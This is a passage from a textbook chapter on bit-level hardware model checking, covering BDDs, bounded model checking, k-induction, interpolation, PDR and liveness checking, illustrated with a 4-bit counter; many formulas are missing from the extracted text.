2018) as well as micro-architectural side channels (Trippel et al. 2019; Hossain et al.
2020). While architectural models have been manually crafted by the researchers,
recent research is showing that they can be generated automatically as well (Hsiao
et al. 2021). Overall, it is a much-needed trend in research that would bring more
automation in reasoning about computer architecture.
33 Verification and Its Role in Design of Modern Computers 1201
Conclusion
References
Armstrong A, Bauereiss T, Campbell B, Reid A, Gray KE, Norton-Wright R, Mundkur P, Wassell
M, French J, Pulte C et al (2019) ISA semantics for armv8-a, risc-v, and cheri-mips
Baier C, Katoen J-P (2008) Principles of model checking. MIT Press
Biere A, Cimatti A, Clarke E, Zhu Y (1999) Symbolic model checking without BDDs. In:
International conference on tools and algorithms for the construction and analysis of systems.
Springer, pp 193–207
Bradley AR (2011) Sat-based model checking without unrolling. In: International workshop on
verification, model checking, and abstract interpretation. Springer, pp 70–87
Bryant RE (1986) Graph-based algorithms for boolean function manipulation. Comput IEEE Trans
100(8):677–691
Burch JR, Clarke EM, McMillan KL, Dill DL, Hwang L-J (1992) Symbolic model checking: 1020
states and beyond. Inf Comput 98(2):142–170
Clarke EM Jr, Grumberg O, Kroening D, Peled D, Veith H (2018a) Model checking. MIT Press
Clarke EM, Henzinger TA, Veith H, Bloem R et al (2018b) Handbook of model checking, vol 10.
Springer
Clarkson MR, Schneider FB (2010) Hyperproperties. J Comput Secur 18(6):1157–1210
Cohen E (1977) Information transmission in computational systems. In: Proceedings of the sixth
ACM symposium on operating systems principles, pp 133–139
Cohen ES (1978) Information transmission in sequential programs. Found Secure Comput
297–335
Denning DE (1976) A lattice model of secure information flow. Commun ACM 19(5):236–243
Eén N, Sörensson N (2003) An extensible SAT-solver. In: International conference on theory and
applications of satisfiability testing. Springer, pp 502–518
1202 S. Ray
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1204
Preliminaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1205
Explicit Example: A Simple Counter . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1205
Linear Time Temporal Logic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1207
Representing Systems Symbolically . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1208
Algorithms for Safety Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1212
The Induction Principle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1212
Overview of Model Checking Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1214
Symbolic Model Checking (with BDDs) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1217
Bounded Model Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1218
k-Induction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1219
Interpolation and Model Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1221
Property Directed Reachability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1225
Combining Interpolation and PDR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1228
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1229
Algorithms for Liveness Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1229
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1229
Overview of Model Checking Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1230
Symbolic Model Checking with BDDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1230
Liveness-to-Safety Conversion (L2S) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1231
Bounded Liveness Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1232
FAIR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1234
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1235
A. Ivrii ()
IBM, Haifa, Israel
e-mail: [email protected]
Y. Vizel ()
Technion - Israel Institute of Technology, Haifa, Israel
e-mail: [email protected]
Abstract
Keywords
Introduction
Preliminaries
Consider the hardware design that appears in Fig. 1. The Verilog code and the
corresponding circuit appear in Fig. 1a and b, respectively. The design is a simple
4-bit counter c. Initially the counter is at 0, and on every step it is either
nondeterministically reset back to 0 (if the reset signal rst is on) or increased by
1. Furthermore, the counter is always reset back to 0 upon reaching 8.
Our design can be also described by a state machine M that appears in Fig. 2.
Since the design has 4 state elements c[3 : 0], 4 bits are used to describe the different
states in M, resulting in a total of 24 = 16 states. Each single execution step of the
circuit in Fig. 1b is captured by an edge in the state machine. For instance, the state
0010 has a transition to the state 0011 corresponding to increasing the value of the
counter when rst = 0 and a transition to the state 0000 corresponding to resetting
Fig. 1 A 4-bit counter. The counter counts to 8 and resets. The counter also resets if the reset
signal rst is on (a) Verilog code. (b) Bit-level circuit
1206 A. Ivrii and Y. Vizel
Fig. 2 A finite-state machine describing the design in Fig. 1. The state 0000 is the initial state. For
clarity, the transitions to the initial state are shown as dashed. The states 1001, 1010, 1011, 1100,
1101, 1110, and 1111 cannot be reached from the initial state
the counter when rst = 1. The initial state c = 0 of the circuit translates to the state
0000 being the only initial state of M.
The Verilog code also includes several properties that one may want to check
about the design. The first property P 1 asserts that the counter never reaches the
value of 6 for any possible execution of the system. Clearly, this property does not
hold, as the counter will reach the value of 6 in exactly 6 steps if the reset is not
triggered. Equivalently, there is a “counterexample path” of length 6 in the state
machine, starting from the initial state 0000 and ending at the “bad” state 0110
violating the property:
is another counterexample, with the transition from 0001 to 0000 due to reset
occurring on the second cycle. However, one can easily check that there are no
counterexample paths of length smaller than 6, that is, the initial state 0000 cannot
reach the bad state 0110 in a sequence of 5 steps or less. The second property P 2
asserts that the counter is always smaller than 10 for any possible execution of the
system. Clearly, this property holds. In fact, the set of states reachable from the
initial state is given by
and each of these states satisfies the condition c < 10. The properties P 1 and P 2
are the so-called safety properties that (intuitively) say that “some bad thing never
happens.”
34 Bit-Level Model Checking 1207
The property P 3 asserts that for any possible execution of the system, starting
from any state in the execution, the counter will always eventually reach the value
of 8. This property does not hold: consider the execution where the reset signal is
triggered on every second step; the counter will never reach the value of 3, let alone
8. However, an infinite counterexample is needed to explain the failure; no finite-
length explanation will be sufficient. In fact, every finite-length execution can be
completed to an execution where the counter does reach the value of 8. Finally, the
property P 4 asserts that for any possible execution of the system, starting from the
state where c = 3, the counter must eventually reset back to 0. This property holds:
either the reset signal occurs and the counter is reset, or the reset signal does not
occur and the counter eventually reaches 8 and then becomes 0 on the next cycle.
The properties P 3 and P 4 are the so-called liveness properties that (intuitively) say
that “some good thing must keep happening.”
Thinking in terms of states of the finite-state machine M gives a natural way
to analyze the design. For example, in order to check that the system satisfies a
given safety property, one only needs to make sure that the property holds on every
state that can be reached from the initial state. Any graph search algorithm, such
as breadth-first search or depth-first search, would provide an answer. However, a
fundamental problem with this approach is the so-called state explosion problem.
The current design has 4 state elements and requires 24 = 16 to explicitly represent
the states in the corresponding finite-state machine. In general, a design with n state
elements requires 2n states. Unfortunately, the approach of explicitly constructing
all possible states only works for very small values of n.
in either of the forms GFp or F Gq, for suitable signals p and q. See also Rozier
(2011) for a recent survey on the matter. In what follows, the considered safety/live-
ness properties will always be in one of the forms above.
To cope with the state explosion problem, modern model checking algorithm
represents states implicitly using formulas and approximates the set of reachable
states.
Transition System This section explains how it is possible to reason about states
in the design using formulas. Let V be a set of Boolean variables representing state
elements in the design. The set S of all states can be described as S = B|V | , where
def
B := {0, 1}. Given a formula F over V , one can consider F as representing the set of
states in which it is satisfiable, that is, {s ∈ S | F (s) = 1}. Conversely, a set of states
can be described by any formula that represents it. In this case, it is often said that
the set of states is described implicitly or symbolically. In particular, a single state
s ∈ S can be represented as a conjunction of literals (which are satisfied in s). This
already allows to represent the initial states of the design using a formula I nit (V )
and (for safety model checking) represent the “good” states of the design using a
formula P (V ). To describe transitions between states, reasoning about pairs (s, s )
of states is required, with s representing the starting state and s representing the
successor state, respectively. It is also common to refer to s as the “current state”
and to s as the “next state” of a transition. The set of all possible transitions can be
represented by a formula T r(V , V ) over V and V , called the transition relation.
The non-primed variables are usually referred to as current state variables, and the
primed variables are referred to as next-state variables.
Example 1. Consider the state machine that appears in Fig. 2. Let us denote the set
of variables for M as V = {v0 , v1 , v2 , v3 }, where vi describes the ith bit of c. The
initial states are described by the formula
The transition relation is a bit more complex due to many transitions between states.
A partial definition containing only outgoing edges from 0000 and 0001 appears
below:
BDDs and SAT Representing sets of states using logical formulas would not be
very useful if there was no way to represent the formulas concisely or to efficiently
reason about them. Fortunately, such ways exist, with two predominant approaches:
an approach based on binary decision diagrams (BDDs) and an approach based on
satisfiability solving (SAT).
Notation Given two formulas F and G over V , the notation F ⇒ G means that F
logically implies G (i.e., every assignment which satisfies F also satisfies G). For
instance, given the formulas in Example 1, I nit ⇒ P means that the property P
holds on every initial state.
Given a formula F over V , the primed formula F denotes the corresponding
formula in which all variables v ∈ V have been replaced with their primed versions
v ∈ V . In the context of multiple steps of the transition system, the notation V i =
def
Example 3. Let’s compute P ostI mg(I nit, T r) in our running example. It follows
that:
I nit (V ) ∧ T r(V , V ) = ((¬v3 ∧ ¬v2 ∧ ¬v1 ∧ ¬v0 ∧ ¬v3 ∧ ¬v2 ∧ ¬v1 ∧ ¬v0 )∨
∨(¬v3 ∧ ¬v2 ∧ ¬v1 ∧ ¬v0 ∧ ¬v3 ∧ ¬v2 ∧ ¬v1 ∧ v0 )),
where the first disjunct corresponds to the transition from 0000 back to 0000 and
the second disjunct corresponds to the transition from 0000 to 0001. All the other
disjuncts in T r(V , V ) disappear as they are incompatible with I nit (V ) = ¬v3 ∧
¬v2 ∧ ¬v1 ∧ ¬v0 . Thus,
and
P ostI mg(I nit, T r) ≡ (¬v3 ∧ ¬v2 ∧ ¬v1 ∧ ¬v0 ) ∨ (¬v3 ∧ ¬v2 ∧ ¬v1 ∧ v0 ).
The above formula can be written even more compactly as P ostI mg(I nit, T r) ≡
¬v3 ∧ ¬v2 ∧ ¬v1 .
Model checking algorithms aim to establish the safety of a given transition system
or provide a counterexample if the system is not safe. A model checking algorithm
is complete if it is able to either provide a counterexample or prove the absence of
counterexamples of any length and sound if it does not provide a wrong answer.
Most model checking algorithms are based on some form of inductive reasoning.
Consider a transition system M = V , I nit, T r and a (safety) property P .
First, let’s suppose that every initial state of M satisfies P (i.e., I nit ⇒ P ) and
that every state that satisfies P can only transition to another state that satisfies P
(i.e., P ∧T r ⇒ P ). It follows then that all the reachable states in M must satisfy P .
This type of reasoning is called the principle of induction, and the property P is said
to be inductive. Equivalently, if as a set of states P includes all of the initial states
and is closed under the transition relation, then it necessarily contains all of the
reachable states (and, in addition, it may also include some of the non-reachable
states). Checking whether P is inductive can easily be done using a SAT solver, by
checking whether both formulas I nit ∧ ¬P and P ∧ T r ∧ ¬P are unsatisfiable.
In practice, however, the property P is usually not closed under the transition
relation (and thus is not inductive). In this case, P ∧ T r ⇒ P does not hold, or
equivalently the formula P ∧T r ∧¬P is satisfiable. It follows that there exist states
s and t, such that (s, t) ∈ T r, s ∈ P , and t ∈ P . The state s is usually referred to as
a counterexample to induction. This does not mean that M is not safe with respect to
P ; it only means that the safety of P cannot be proved by the principle of induction
alone. So, in order to show that P holds in all reachable states, model checking
algorithms use a more complex type of inductive reasoning in the form of a safe
inductive invariant:
The above lemma leads to the perspective that the goal of a model checking
algorithm is to either synthesize a safe inductive invariant (and by that to prove that
34 Bit-Level Model Checking 1213
the property holds) or to prove that such an inductive invariant does not exist (usually
by finding a counterexample). Checking whether F is a safe inductive invariant for
P can be easily done using a SAT solver, by checking whether the formulas I nit ∧
¬F , F ∧ T r ∧ ¬F , and F ∧ ¬P are all unsatisfiable. However, finding an inductive
invariant (when it exists) is a very challenging task. Model checking algorithms
approach this task by traversing the state space and constructing an inductive trace:
• F0 = I nit
• Fi ∧ T r ⇒ Fi+1 for 0 ≤ i < k
An inductive trace F[k] is monotonic if Fi ⇒ Fi+1 for 0 ≤ i < k and is safe w.r.t. a
property P if Fi ⇒ P for 0 ≤ i ≤ k. The individual propositional formulas Fi in a
trace F[k] are called frames of the trace.
In what follows, an inductive trace F[k] is referred to as a trace, and the subscript
[k] is dropped when clear from the context. In addition, if F is safe w.r.t. a property
P and when P is clear from the context, F is referred to as safe. An element Fi
in a trace F[k] represents an over-approximation of all states reachable in i steps of
the transition system. If the trace is monotonic, then Fi is an over-approximation of
all states reachable in at most i steps. Monotonic traces arise (1) in the context of
BDD-based model checking (Burch et al. 1990), where the set of reachable states
is iteratively increased until either a fixed point is reached or a counterexample is
detected, and (2) in SAT-based model checking algorithms such as ISB (Vizel and
Grumberg 2009), PDR (Bradley 2011), and AVY (Vizel and Gurfinkel 2014).
The following definition and lemma highlight the relationship between an
inductive invariant (Definition 2) and an inductive trace (Definition 3).
def
Definition 4. Let F[k] be a trace. Let us define F i = ij =0 Fj where 0 ≤ i < k. If
there exists 0 ≤ i < k such that Fi+1 ⇒ F i , then F is referred to as closed w.r.t. i.
This section provides a brief overview of the principles and mechanics underlying a
number of widely used model checking techniques for safety properties. These tech-
niques are summarized in Table 1, illustrated in Figs. 5, 6, 7, and 8, and described
in detail in sections “Symbolic Model Checking (with BDDs)” to “Combining
Interpolation and PDR ”. Whenever possible, the techniques are illustrated using
the transition system M = V , I nit, T r described in section “Explicit Example:
A Simple Counter”, except that the reset signal rst is assumed to be always
off. This allows to write the transition relation in a slightly simplified form as
T r = (c = (c == 8) ? 0 : c + 1). The safety property considered is P : c < 10.
Symbolic Model Checking (SMC) with BDDs Using logical formulas to traverse
the state space of a given transition system and representing them using reduced
ordered binary decision diagrams (ROBDDs, BDDs for short) (Bryant 1986) was
introduced in the seminal work of McMillan et al. (Burch et al. 1990). In fact, this
work has enabled the application of model checking algorithms to realistic circuits
with hundreds of state variables. SMC uses the post-image operator, which for a
given set of states computes all states that are reachable from that set of states in
Fig. 5 Symbolic model checking with BDDs. The set Ri represents all states that are reachable
in i steps or less from the initial states. Each Ri is obtained as the disjunction of Ri−1 and the
post-image operator applied to Ri−1 . Note that R0 := I nit
Fig. 6 Bounded model checking (BMC) checks whether a property P can be violated in k steps
by encoding reachable sets of states (R1 , . . . , Rk ) as a SAT instance (without computing Ri s
explicitly). BMC does not identify repeatedly visited states and cannot determine whether the
property holds for arbitrarily many steps
one step of the transition relation T r. The post-image operator is used iteratively,
starting from the initial states in order to compute all states that are reachable from
the initial states. This process continues until either it discovers a bad state that is
reachable or it reaches a fixed point, concluding that no reachable state is a bad state.
In the former case, a counterexample is found, while, in the latter case, the property
is proved correct. The iterative application of the post-image operator is illustrated
in Figs. 4 and 5.
1216 A. Ivrii and Y. Vizel
Bounded Model Checking (BMC) The success of BMC (Biere et al. 1999) is
based on its ability to find counterexamples. BMC is based on the exploration of
bounded paths in a transition system M. To this end, BMC unwinds the transition
relation T r, as illustrated in Fig. 6 and explained in section “Bounded Model
Checking”, in order to determine whether the property P can be violated in exactly
k steps.
initial states, and (the “step case”) whenever P holds for k consecutive steps of the
transition system, then it necessarily also holds in the subsequent step. One can see
that if such a k exists, then P holds on all reachable states and that the principle of
induction corresponds to the case of k = 1. k-Induction is usually used with BMC.
With the additional unique state constraints, k-induction is complete (Sheeran et al.
2000), namely, if a transition system M is safe, then there exists a k for which both
the base and step case can be proved.
Property Directed Reachability The PDR algorithm (Bradley 2011; Een et al.
2011) (originally called IC3 (IC3 stands for “Incremental Construction of Inductive
Clauses for Indubitable Correctness”; PDR stands for “ Property Directed Reacha-
bility.”)) differs from the abovementioned algorithms as it does not explicitly unroll
the transition relation (viz., it does not use the pathi,j formulas). PDR maintains
a monotonic safe trace (as illustrated in Fig. 8), which is incrementally refined
by eliminating states that can be proven unreachable by means of consecution
checks (Definition 2) over subsequent frames. PDR’s focus on single steps of the
transition relation enables an efficient and targeted generation of relatively inductive
clauses. Unlike interpolation-based techniques, PDR does not depend on the (usually
unpredictable) results produced by an interpolation engine.
one by one. This limited the applicability of model checking algorithms for two
obvious reasons: this requires to (i) construct the state graph and (ii) traverse its
states. Achieving both of these is intractable for state graphs of realistic systems,
simply because they consist of too many states. For example, a hardware design
with a 32-bit register has 232 states. As a result, explicit model checking algorithms
could not be applied to realistic systems.
A decade after, in the seminal work of McMillan et al. (Burch et al. 1990), the
paradigm has changed with the introduction of symbolic model checking (SMC)
using binary decision diagrams (BDDs). Unlike explicit model checking algorithms,
SMC does not require to construct the state graph and does not explicitly traverse
the states of the system one by one. Instead, it uses logical formulas to represent
the system and various sets of states. These logical formulas are represented using a
data structure called BDDs (Bryant 1986) (The interested reader can find all details
about BDDs and their use in this context in Clarke et al. 2001.). This new paradigm
allowed to apply model checking to systems that are orders of magnitude larger than
what was possible with explicit model checking.
BDD-based symbolic model checking is an iterative process for checking P in
all states reachable from I nit in M. At each iteration i, SMC computes the set Ri
of states that are reachable in i steps or less from the initial states and checks if
all the states in Ri satisfy P . The computation uses the post-image operator (see
Section “Representing Systems Symbolically” and Figs. 4 and 5). Specifically, Ri s
are defined in the following manner:
For each such set Ri of reachable states, SMC checks whether Ri ⇒ P , that is,
whether all the states are reachable in i steps or less satisfy the property P . If this
implication does not hold, then there exists a state that is reachable in at most i steps
that violates P . Hence, SMC concludes that a counterexample is found.
If the implication does hold, SMC checks if a fixed point is reached. Note that
from the definition of Ri , it holds that Ri−1 ⇒ Ri . Therefore, a fixed point is
reached when Ri ⇒ Ri−1 . In case a fixed point is found, SMC concludes that all
reachable states satisfy P and hence the property holds. Otherwise, it moves to the
next iteration. Note that F := R0 , R1 , . . . , Rk is a trace as per Definition 3.
BMC (Biere et al. 1999) is an iterative process for checking P on all initial
paths of M up to a given bound on the length. BMC is a SAT-based algorithm.
Given a transition system M and a specific length k, BMC translates the question
“Does M have a counterexample of length k?” into a propositional formula and
uses a SAT solver to determine if the formula is satisfiable or not. As explained
in Section “Representing Systems Symbolically”, a SAT solver can either find
a satisfying assignment or prove its absence. If the solver finds a satisfying
34 Bit-Level Model Checking 1219
1 Function BMC(M, P , N )
2 k ← 0;
3 while k <= N do
4 if ISSAT(ϕ k ) then
5 return CEX;
6 end
7 k = k + 1;
8 end
9 end
10 return P holds up to N
Formula 2.
ϕ k =I nit (V 0 ) ∧ path0,k ∧ ¬P (V k )
def
The formula ϕ k implicitly represents all paths of length k in the transition system
that reach a bad state at step k. If there exists a satisfying assignment for ϕ k , then
there exists a path of length k violating P , and the property does not hold.
In theory, BMC can conclude that the property holds on all reachable states once
N exceeds the diameter of the transition system: the length of the longest path
among all shortest paths from an initial state to some other state in the system.
However, in practice, it is hard to compute this bound, and even when known, it
is often too large to handle (Clarke et al. 2004). BMC cannot compute a trace and
therefore cannot find an inductive invariant. Thus, in practice, the main drawback of
BMC is its incompleteness: BMC can only prove the absence of counterexamples
of length up to a given bound but cannot guarantee that there is no counterexample
of arbitrary length.
k-Induction
a generalization of the induction principle and consists of two steps: (1) a base case,
which checks that all initial paths of length k satisfy P , and (2) a step case (viz., the
induction step), which checks that all paths of length k that satisfy P can only be
extended to paths of length k + 1 that also satisfy P . A path is said to satisfy P if
every state along the path satisfies P . Note that such a path does not have to start at
an initial state.
The two steps are now described in more detail:
• Base Case: Checking that all initial paths of length k satisfy P is equivalent
to proving there is no counterexample of length k or less. Hence, this step can
be executed using BMC. More precisely, by showing that ϕ i is unsatisfiable for
0 ≤ i ≤ k.
• Step Case: To prove that every path of length k that satisfies P can only be
of length k + 1 that also satisfies P , the following formula
extended to a path
needs to hold: ( ki=0 P (V i )) ∧ path0,k+1 ⇒ P (V k+1 ). To check if the above
formula holds, the following formula is built:
k
Formula 3. χ k = ( i )) ∧ path0,k+1 ∧ ¬P (V k+1 )
def
i=0 P (V
1 Function kIND(M, P , N )
2 if ISSAT(ϕ 0 ) then
3 return CEX;
4 end
5 k ← 1;
6 while k <= N do
7 if ISSAT(ϕ k ) then
8 return CEX;
9 end
10 if ISUNSAT(χ k ) then
11 return P holds;
12 end
13 k = k + 1;
14 end
15 end
16 return P holds up to N
Example 4. Consider the transition system M from Fig. 2 and the property P :=
(c < 10). One can check that P is not 1-inductive. Write the formula P ∧ T r ∧ ¬P
in a simplified form:
By further strengthening the “inductive step” χ k formulas with the simple path
constraint (which requires all the states on the path path0,k+1 to be distinct),
k-induction becomes a complete algorithm (Sheeran et al. 2000); that is, every true
property can be proven by k-induction for a suitable value of k. However, in practice
k-induction only works when a small value of k suffices for the proof, as otherwise
the formulas become too difficult for a SAT solver. As it happens, in practice,
k-induction is not able to solve most properties of interest, and other forms of
inductive reasoning are needed.
Multiple complete SAT-based model checking algorithms are based on the concepts
of interpolation.
where L(A) denotes the set of all atomic propositions in A. Such I always exists
for an unsatisfiable pair (A, B).
The pseudocode for ISB appears in Algorithm 3. The procedure MKSEQ parti-
tions the BMC formula as described in the text. Moreover, the procedure ISSAT(Ak )
operates on the conjunction of the elements of the trace. Note also that when F
is closed, an inductive invariant is found (Definition 4 and Lemma 2). A detailed
description of ISB appears in Vizel and Grumberg (2009) and Cabodi et al. (2011).
In the original description of ITP (McMillan 2003), Formula 4 is used. ITP uses
nested loops where the inner loop computes a safe trace by repeatedly checking
formulas of the form ψ k with a fixed k, and the outer loop increases the bound
k when needed. The safe trace is computed inside the inner loop by extracting
interpolants from unsatisfiable BMC formulas. Let us now describe the nested loops
in more detail:
• Inner Loop: In general, the inner loop checks a fixed-bound BMC formula.
At the first iteration, ψ k is checked. If this BMC formula is satisfiable, then a
counterexample exists, and the algorithm terminates. If it is unsatisfiable, then
the following (A, B) pair is defined:
– A = I nit (V 0 ) ∧
def
T r(V 0 , V 1 )
– B = path ∧ ( ki=1 ¬P (V i ))
def 1,k
A detailed comparison between ITP and ISB appears in Vizel and Grumberg
(2009).
The introduction of PDR (Bradley 2011; Een et al. 2011) has drastically changed the
way that SAT-based model checking is perceived. Usually referred to as the “mono-
lithic” approaches, interpolation-based techniques use SAT-solving as a blackbox
that can either find a satisfying assignment or generate a proof of unsatisfiability.
Intuitively, the proof of unsatisfiability represents a way to generalize a bounded
proof into a candidate inductive invariant. While interpolation-based approaches
utilize the full strength of state-of-the-art SAT solvers, there is little control over
the performed generalization or the “inductiveness” of the generated candidate.
PDR, however, waives some of the strengths of the SAT solver and in return gains
control over the generation of the candidate inductive invariant. This is achieved
by employing a very specific search strategy. PDR’s search strategy is based on a
backward search that starts from the unsafe (or “bad”) states in ¬P . The algorithm
maintains a monotonic safe trace F := F0 , . . . , Fk , where each frame Fi over-
approximates the set of states reachable from I nit in up to i steps of T r. In addition,
PDR maintains a queue Q of proof obligations s, i, where s is a state that can reach
a bad state in some number of transitions and i is the level of s, defined as the index
of the smallest frame of the trace containing s (as the trace is monotonic, this means
that s ∈ Fi \ Fi−1 ). At each iteration, PDR picks a proof obligation s, i from Q,
prioritizing proof obligations with lower level. Then PDR tries to find a one-step
predecessor of s in Fi−1 and add it to Q with level i − 1. If at any point Q contains
an initial state, then by construction there is a counterexample path from an initial
state to a bad state. If no one-step predecessor of s exists, then PDR “blocks” s
using a process called inductive generalization. The generalization technique yields
a clause that is inductive relative to Fi−1 , which is then used to strengthen the
frames F0 , . . . , Fi of the trace, excluding s from these over-approximations (see
Fig. 8). The algorithm terminates if either a counterexample is found or a frame is
determined to be an inductive invariant that proves the property.
Notably, the SAT queries made by PDR involve only a single step of the transition
relation. Each state s is represented by a conjunction of literals over V whose only
satisfying assignment corresponds to s; accordingly, its negation ¬s is a clause.
Consequently, the SAT queries performed by PDR are computationally cheap (in
comparison to ITP).
In the following, PDR is described in more detail. The PDR algorithm (Bradley
2011) iteratively refines and extends a monotonic safe trace where the frames are in
CNF. In each (outer) iteration, the algorithm performs one of two actions:
1226 A. Ivrii and Y. Vizel
Example 5. Back to our running example, suppose that the property being verified
is P : c ≤ 10. Let us assume that just before its fourth (outer) iteration, PDR
has constructed the trace F := F0 , F1 , F2 , F3 , with F0 = I nit = {c = 0},
F1 = {c ≤ 1}, F2 = {c ≤ 2}, and F3 = {c ≤ 3}. One can easily verify that F is
indeed a safe inductive trace.
PDR starts a new iteration and checks whether F3 ∧ T r ⇒ P holds:
Clearly, this formula is unsatisfiable. PDR adds a new frame F4 = {c ≤ 10} to the
trace, resulting in F := F0 , F1 , F2 , F3 , F4 . The pushing optimization is applied,
but no clause can be propagated forward.
PDR starts another iteration and checks whether F4 ∧ T r ⇒ P holds:
As this formula is unsatisfiable, PDR adds a new frame F5 = {c ≤ 10} to the trace
F . The pushing optimization is applied but does not succeed in pushing the clause
c = 10 from F4 to F5 , as
It is, and based on the satisfying assignment, PDR creates another proof obligation
c = 9, 4. Since there is no predecessor for c = 9 in F3 , PDR blocks this proof
obligation by adding c = 9 to F4 (and the lower frames). The proof obligation
c = 10, 5 is now also blocked as it no longer has a predecessor in F4 . Thus, PDR
adds c = 10 to F5 . It is easy to see that F5 ∧ T r ⇒ P now holds. At this point,
F̄ := F0 , F1 , F2 , F3 , F4 , F5 , with F0 = I nit = {c = 0}, F1 = {c ≤ 1}, F2 =
{c ≤ 2}, F3 = {c ≤ 3}, F4 = {c ≤ 10, c = 10, c = 9}, and F5 = {c ≤ 10, c = 10}.
1228 A. Ivrii and Y. Vizel
Now, pushing is applied, and PDR tries to push c = 9 from F4 to F5 , that is, to check
whether F4 ∧ T r ⇒ (c = 9) holds:
The above example demonstrates how PDR cleverly directs the generation of
the inductive invariant and how it replaces a few “monolithic” SAT queries used
by interpolation-based techniques by a large number of “incremental” single-step
queries. PDR owes additional performance improvements to numerous optimiza-
tions (Hassan et al. 2013; Gurfinkel and Ivrii 2015; Cabodi et al. 2017; Froleyks and
Biere 2021) (to name a few).
Summary
Safety model checking is the backbone of many formal verification tools. This
section reviewed some of the most successful safety model checking algorithms.
Our exposition closely follows the history of advancements in relative scalability:
from explicit-state model checking to symbolic model checking with BDDs, to
bounded model checking and k-induction, to interpolation-based approaches, and
finally to PDR. It is important to note that in practice there is no “one algorithm
to rule them all,” and usually multiple algorithms are run in parallel on the
same verification task. When one algorithm reaches a definitive answer, all other
algorithms are terminated.
Introduction
Intuitively, a liveness property says that “a good thing must keep happening.” In
linear time temporal logic, liveness properties are commonly expressed in the form
GFp, (Gu → v), or F Gq. The property of the form GFp states that on every
path the signal p must hold infinitely often, the property of the form (Gu → v)
states that on every path every occurrence of u must be eventually followed by an
occurrence of v, and the property of the form F Gq states that on every path the
signal q must eventually hold forever. A counterexample to a liveness property is
necessarily of infinite length. Liveness verification often involves the use of fairness
constraints f1 , . . . , fm , which restrict the set of valid counterexamples to infinite
traces for which f1 , . . . , fm hold infinitely often. Equivalently, a liveness property
of the form GFp together with fairness constraints f1 , . . . , fm can be written as
GFf1 ∧ . . . GFfm ⇒ GFp. General liveness properties, together with fairness
constraints, may be reduced to either of the forms GFp or F Gq using additional
logic (Wolper et al. 1983). While various liveness checking algorithms may benefit
from considering fairness constraints directly, in the present discussion of model
checking algorithms, it is assumed that the liveness property is either of the form
GFp or F Gq, choosing the form that is best suited to the algorithm at hand.
Given a liveness property of the form GFp, a counterexample to such a property
is an infinite trace on which p holds only finitely many times. Since the state space
of hardware models is finite, such a counterexample can be represented by a lasso-
shaped trace, consisting of a prefix from an initial state to a ¬p-state s and a
repeating loop suffix from s back to itself, with ¬p holding on every state of the
loop suffix, as is illustrated in Fig. 9. Similarly, a counterexample to F Gq is an
infinite trace on which ¬q occurs infinitely many times and can be represented by a
lasso-shaped trace, consisting of a prefix from an initial state to a ¬q-state s and a
repeating loop suffix from s back to itself (note that ¬q needs to hold only once on
the loop, and without loss of generality it is assumed that this happens at s).
1230 A. Ivrii and Y. Vizel
Fig. 9 A lasso-shaped counterexample to the liveness property GFp consisting of a prefix and a
repeating loop suffix. An infinite-length counterexample to F Gp can be obtained by (infinitely)
unrolling the loop suffix
Even though liveness checking and safety checking are in the same complexity
class, liveness checking is known to be significantly less scalable in practice.
Table 2 summarizes some of the most widely used techniques for liveness verifica-
tion. The following sections provide additional details.
Similar to safety model checking with BDDs described in section “Symbolic Model
Checking (with BDDs)”, liveness properties can be solved with BDDs via suitable
fixed-point computations. The reader is referred to Ravi et al. (2000) for the
detailed description and comparison of various BDD-based liveness algorithms.
34 Bit-Level Model Checking 1231
Fig. 10 Liveness-to-safety conversion: (left) the original liveness property, (right) the equivalent
safety property
1232 A. Ivrii and Y. Vizel
is that it doubles the number of state variables, substantially increasing the problem
size and in practice yielding problems that are very hard to verify. Therefore,
developing algorithms that can natively solve the original liveness problem remains
an important research topic. Such algorithms will be presented in the following
sections.
L2S with Abstraction The work Baumgartner and Mony (2009) describes an
extension of L2S that trades completeness for smaller design size. It uses abstraction
to choose a subset of state elements duplicated for the state repetition check. If the
abstracted translation yields a proof, this constitutes a valid proof for the original
translation (with all of the state elements duplicated). However, a counterexample
for the abstracted translation may not represent a valid counterexample for the
original translation, in which case refinement needs to be performed.
Counter-Based Translation
Recall that to prove that a liveness property GFp holds, one needs to prove that for
